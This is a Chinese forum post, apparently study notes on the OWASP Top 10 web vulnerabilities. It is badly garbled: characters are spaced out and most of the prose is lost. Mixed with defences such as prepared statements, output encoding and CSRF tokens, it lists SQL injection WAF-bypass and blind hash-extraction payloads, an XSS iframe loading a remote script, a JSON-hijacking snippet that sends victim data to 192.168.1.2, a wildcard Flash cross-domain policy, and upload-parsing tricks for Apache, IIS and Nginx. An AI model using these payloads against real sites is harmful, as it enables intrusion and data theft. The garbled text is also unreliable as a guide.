搜索

[17962] 2021-04-15_【网络安全web学习系列】(一)-OWASP_top_10漏洞的总结笔记

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2021-04-15_【网络安全web学习系列】(一)-OWASP_top_10漏洞的总结笔记 w e b - O W A S P _ t o p _ 1 0 H a c k i n g   2 0 2 1 - 0 4 - 1 5 O W A S P   t o p   1 0   W e b ~ ~   S Q L   I n j e c t i o n & B l i n d   S Q L   I n j e c t i o n S Q L S Q L W A F   X S S       C S R F C S R F F i l e   U p l o a d F i l e   I n c l u d e   I n s e c u r e   C a p t c h a   C o m m a n d   I n j e c t i o n P H P d i s a b l e _ f u n c t i o n s   B r u t e   F o r c e S Q L   I n j e c t i o n & B l i n d   S Q L   I n j e c t i o n S Q L S Q L W A F 1 .   2 .   3 .  
? i d = 1   u n i / * * / o n   s e l e / * * / c t   1 , 2 , 3   #   4 .   W A F ? i d = 1   u n / / i o n   s e l / / e c t   1 , 2 , 3   # W A F u n i u n i o n o n 5 .   H T T P ( H P P )   ? i d = 1   u n i o n   s e l e c t   1 , 2 , 3   f r o m   u s e r s   w h e r e   i d = 1   #   ? i d = 1   u n i o n   s e l e c t   1 & i d = 2 , 3   f r o m   u s e r s   w h e r e   i d = 1   #   & i d =   W A F   ? i d = 1 / * / u n i o n / & i d = / s e l e c t / & i d = / p w d / & i d = / f r o m / & i d = * / u s e r s   #   s e l e c t   *   f r o m   t a b l e   w h e r e   a = . $ _ G E T [ a ] .   a n d   b = . $ _ G E T [ b ] .   l i m i t   . $ _ G E T [ c ] ;   ? a = 1   u n i o n / & b = / s e l e c t   1 , p a s s / & c = / f r o m   u s e r s   #   s e l e c t   f r o m   t a b l e   w h e r e   a = 1   u n i o n /   a n d   b = / s e l e c t   1 , p a s s / l i m i t   * / f r o m u s e r s   #   6 .   使   o r   / a n d   ? i d = 1   o r   0 x 5 0 = 0 x 5 0   ? i d = 1   a n d   a s c i i ( l o w e r ( m i d ( ( s e l e c t   p w d   f r o m   u s e r s   l i m i t   1 , 1 ) , 1 , 1 ) ) ) = 7 4 s e l e c t   p w d   f r o m   u s e r s   l i m i t   1 , 1   u s e r s     p w d       m i d ( )   l o w e r ( )     a s c i i       a s c i i     7 4 7 .   ! = < > < > = 8 .   s u b s t r i n g ( ) m i d ( ) s u b s t r ( ) a s c i i ( )   h e x ( ) b i n ( ) 使 b e n c h m a r k ( ) s l e e p ( ) g r o u p _ c o n c a t     c o n c a t   c o n c a t _ w s     3 s u b s t r i n g ( ( s e l e c t   p a s s w o r d ) , 1 , 1 )   =   0 x 7 0 s u b s t r ( ( s e l e c t   p a s s w o r d ) , 1 , 1 )   =   0 x 7 0 m i d ( ( s e l e c t   p a s s w o r d ) , 1 , 1 )   =   0 x 7 0     p a s s w o r d     s t r c m p ( l e f t ( p a s s w o r d , 1 ) ,   0 x 6 9 )   =   1 s t r c m p ( l e f t ( p a s s w o r d , 1 ) ,   0 x 7 0 )   =   0
s t r c m p ( l e f t ( p a s s w o r d , 1 ) ,   0 x 7 1 )   =   - 1   l e f t     1   s t r c m p     0 - 1 1 9 .   o r a n d i n d e x . p h p ? i d = 1 a n d o r   1   i n d e x . p h p ? u i d = s t r c m p ( l e f t ( ( s e l e c t + h a s h + f r o m + u s e r s + l i m i t + 0 , 1 ) , 1 ) , 0 x 4 2 ) + 1 2 3 1 2 3     h a s h     0 x 4 2     B s t r c m p 0 0 + 1 2 3 = 1 2 3   B a n d     o r   1 0 .   ? i d = ( 1 ) u n i o n ( s e l e c t ( 1 ) , m i d ( h a s h , 1 , 3 2 ) f r o m ( u s e r s ) )       ? i d = ( 1 ) u n i o n ( ( ( ( ( ( ( s e l e c t ( 1 ) , h e x ( h a s h ) f r o m ( u s e r s ) ) ) ) ) ) ) ) ? i d = ( 1 ) o r ( 0 x 5 0 = 0 x 5 0 ) 1 1 . i d = 1   a n d   ( s e l e c t   1 ) = ( S e l e c t   0 x A A A A A A A A A A A A A A A A A A A A A ) + U n I o N + S e L e C T + 1 , 2 , v e r s i o n ( ) , 4 , 5 , d a t a b a s e ( ) , u s e r ( ) , 8 , 9 , 1 0   #   A     1 0 0 0   1 使         (     % U R L i n d e x . p h p ? i d = 1 ' 2 1   a n d   1 = 1 1   a n d   1 = 2     1   a n d   1 1   a n d   0 3 U R L - 1 - 0 ' % 2 B ' ' % 2 B ' a - 1 i n d e x . p h p ? i d = 1 2 3 - 1 访 S Q L - 0 i n d e x . p h p ? i d = 1 2 3 - 0 访 - 1 S Q L ' % 2 B ' ' % 2 B ' a % 2 B + U R L ' % 2 B ' i n d e x . p h p ? i d = 1 2 3 ' % 2 B ' ' % 2 B ' a S Q L i d 4
1   a n d   1 = 1   #     1   a n d   1 = 2   #     S Q L 使 1 使 使   S Q L   2   S Q L   3 4 5 6 7   S Q L   8 使   S Q L   9   w e b   使   W A F   1 P r e p a r e d S t a t e m e n t S Q L S Q L 使 s q l S Q L S Q L 便 : 1 s q l ? 2 S t a t e m e n t s q l s q l p r e p a r e d S t a t e m e n t 4 s q l e x e c u t e ( ) 3 s e t X X ( s q l 1 s e t X X s e t S t r i n g i n d e x s t r 4
S t r i n g   s q l = " s e l e c t   i d , n o   f r o m   u s e r   w h e r e   i d = ? " ; P r e p a r e d S t a t e m e n t   p s   =   c o n n . p r e p a r e S t a t e m e n t ( s q l ) ; p r e s t m t . s e t I n t ( 1 , i d ) ; p r e s t m t . e x e c u t e Q u e r y ( ) ; 2 s q l 使   X S S H T M L   1 h t m l s p e c i a l c h a r s ( ) H T M L s t r _ r e p l a c e ( ) 2 使 X S S   F i l t e r 1 J S S Q L <   >   j a v a s c r i p t       &   #   e x p r e s s i o n 2   使 H T M L P H P h t m l s p e c i a l c h a r s ( ) A S P S e r v e r . H T M L E n c o d e ( ) A S P . N E T S e r v e r . H t m l E n c o d e ( ) H T M L H T M L H T M L <     & l t ;     & # 6 0 >     & g t ;     & # 6 2 &     & a m p ;     & # 3 8     & q u o t ;     & # 3 4
                    & # 3 9 ; 3 4 N o s c r i p t F i r e f o x 5 A n t i _ X S S 6 H t t p O n l y X S S J S d o c u m e n t . c o o k i e c o o k i e W e b S e t - C o o k i e H t t p O n l y C o o k i e J S C o o k i e P H P H t t p O n l y 1   p h p . i n i 1 T R U E 2   s e t c o o k i e ( ) s e t r a w c o o k i e ( ) 3 P H P 7 W e b U R L 8 使 W A F 9 D O M X S S D O M X S S D O M D O M 1   使 使 2   J S D O M D O M H T M L H T M L H T M L < s c r i p t > J S   C S R F C S R F   i d   e m a i l   C S R F     C S R F   1 X S S   2 3 J S O N   H i j a c i n g 4 F l a s h   A s c t i o n S c r i p t c r o s s d o m a i n . x m l
1 X S S   X S S 使 X S S   < i f r a m e   w i d t h = 0   h e i g h t = 0   s r c = h t t p : / / / s e a r c h . p h p ? k = > < s c r i p t   s r c = h t t p : / / / g e t . j s > < / s c r i p t > > < / i f r a m e > g e t . j s   / / u s e   D O M   m e t h o d   t o   g e t   y o u r   d a t a n e w   I m a g e ( ) .   s r c = h t t p : / / / a . p h p ? d a t a = + d a t a ;   a . p h p     u r l   u r l   访 2 使   J S O N   H i j a c k i n g 使   J S O N   < s c r i p t >   f u n c t i o n   h i j a c k ( o ) { / / u s e   D O M   m e t h o d   t o   g e t   y o u r   d a t a n e w   I m a g e ( ) . s r c = " h t t p : / / 1 9 2 . 1 6 8 . 1 . 2 / J S O N H i J a c k . a s p ? h i = " + e s c a p e ( d a t a ) ; } < / s c r i p t > < s c r i p t   s r c = h t t p : / / a p i . f a n f o u . c o m / p r i v a t e _ m e s s a g e s / i n b o x . j s o n ? c a l l b a c k = h i j a c k & c o u n t = 2 > < / s c r i p t > 使 F l a s h   A c t i o n S c r i p t   c r o s s d o m a i n . x m l   A S < ? x m l   v e r s i o n = " 1 . 0 " ? > < c r o s s - d o m a i n - p o l i c y > < a l l o w - a c c e s s - f r o m   d o m a i n = " * "   / > < / c r o s s - d o m a i n - p o l i c y > i m p o r t   f l a s h . n e t . * ;   v a r   _ l   =   n e w   U R L L o a d e r ( n e w   U R L R e q u e s t ( h t t p : / / / " ) ) ; _ l . a d d E v e n t L i s t e n e r ( E v e n t . C O M P L E T E , f u n c t i o n ( ) { t e x t 1 . t e x t   =   _ l . d a t a } ) ; _ l . l o a d ( ) ;
  R e f e r e r     C S R F     C S R F   C S R F T e s t e r C S R F   R e q u e s t   B u i l d e r     C S R F T e s t e r   C S R F   使   C S R F T e s t e r   访   C S R F T e s t e r   C S R F     C S R F   1     5     H T T P R e f e r e r   t o k e n     H T T P   使 P O S T G E T 1   H T T P R e f e r e r   H T T P   R e f e r e r   H T T P   便 访 2   t o k e n     H T T P   t o k e n t o k e n   t o k e n     t o k e n     C S R F   C S R F     C o o k i e   3   H T T P   使   t o k e n     t o k e n   H T T P     H T T P   X M L H t t p R e q u e s t     c s r f t o k e n     H T T P   t o k e n     t o k e n   便   t o k e n     R e f e r e r   4   P O S T     G E T   使 P O S T G E T   a s p   使   R e q u e s t     G E T   5 使 2   3   H T T P     R e f e r e r   C S R F     F i l e   U p l o a d 1 1 j a v a s c r i p t   使 B u r p s u i t e P O S T D V W A 2 h t t p   r e q u e s t   M I M E   使 B u r p s u i t e P O S T   M I M E D V W A
2 / 3 /   J a v a S c r i p t           H T T P   r e q u e s t M I M E             4   ( )
  1 . p h p   j a v a s c r i p t   M I M E   2 ( ) ( 1 ) P H P ( 2 ) . h t a c c e s s ( 3 ) W e b 1 . A p a c h e   t e s t . p h p . a b c a b c A p a c h e x 1 . x 2 . x 3 A p a c h e   x 3 x 1 x 3 A p a c h e A p a c h e x 2                   2 . I I S   t e s t . a s p / a b c     t e s t . a s p ; a b c       a b c / d e f . p h p   a b c d e f I I S 6 . 0 a s p " . a s p " a s p " . a s p ; " a s p I I S 7 . 0 / 7 . 5 p h p N g i n x U R L   " / . p h p " p h p 3 . N g i n x  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理